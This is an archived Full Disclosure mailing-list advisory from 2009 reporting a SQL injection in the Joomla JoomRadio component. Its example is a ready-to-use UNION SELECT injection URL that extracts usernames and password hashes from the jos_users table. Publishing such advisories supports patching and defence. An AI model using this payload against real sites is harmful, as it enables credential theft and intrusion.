Full Disclosure mailing list archives
Joomla Component com_joomradio SQL Injection
From: 0o_zeus_o0 <zeus.olimpusklan () gmail com>
Date: Wed, 18 Feb 2009 19:32:02 +0100
########################################################################### # Advisory X # Title: Joomla Component com_joomradio SQL Injection # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: arturo_zamora_c () hotmail com # Website: www.securitybroken.com # Date: 18/02/09 # Risk: Medium # Vendor Url: http://ajaxportal.eu/ # Affected Software: JoomRadio # autor script:author XrByte <info () exp ee>, Grusha <grusha () feellove eu> ################################################################## # #Example: ################################################################## #htp:// victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_radio&id=-1UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users-- # ################################################################## #greetz: # # original advisorie: http://www.securitybroken.com ##################################################################
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Joomla Component com_joomradio SQL Injection 0o_zeus_o0 (Feb 18)
- Re: Joomla Component com_joomradio SQL Injection Packet Storm (Feb 19)
- <Possible follow-ups>
- Re: Joomla Component com_joomradio SQL Injection bobby . mugabe (Feb 19)
- Re: Joomla Component com_joomradio SQL Injectionhas infolookup (Feb 19)